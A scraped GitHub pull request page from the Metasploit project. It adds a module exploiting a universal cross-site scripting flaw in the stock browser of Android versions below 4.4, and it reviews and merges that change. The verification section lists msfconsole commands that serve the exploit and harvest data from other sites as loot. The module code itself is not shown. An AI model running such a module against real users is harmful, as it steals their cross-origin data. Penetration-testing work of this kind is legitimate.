Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add another Android < 4.4 UXSS exploit #4105

Merged
merged 4 commits into from Nov 4, 2014

Conversation

jvennix-r7
Copy link
Contributor

Verification

  • Run the exploit against http://example.com and https://pages.github.com:

    $ ./msfconsole
    msf> use auxiliary/gather/android_object_tag_webview_uxss
    msf> set TARGET_URLS http://example.com,https://pages.github.com
        TARGET_URLS => http://example.com,https://pages.github.com
    msf> set URIPATH /j
      URIPATH => /j
    msf> run -j
      [*] Auxiliary module running as background job
      [*] Using URL: http://0.0.0.0:8080/j
      [*]  Local IP: http://192.168.0.4:8080/j
      [*] Server started.
    
  • In android < 4.4 stock browser browse to the URL output by the module

  • You should have two items saved as loot, containing the details of http://example.com and https://pages.github.com

@@ -0,0 +1,143 @@
##
# This module requires Metasploit: http//metasploit.com/download
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

http://

Don't worry, most people are making this mistake. But we gotta stop it :-)

@wvu wvu added the hotness Something we're really excited about label Nov 3, 2014
@wvu wvu self-assigned this Nov 4, 2014
@wvu wvu merged commit 1e9f9ce into rapid7:master Nov 4, 2014
@wvu
Copy link
Contributor

wvu commented Nov 4, 2014

VENNIX!!!!!!! :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
feature hotness Something we're really excited about module
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

4 participants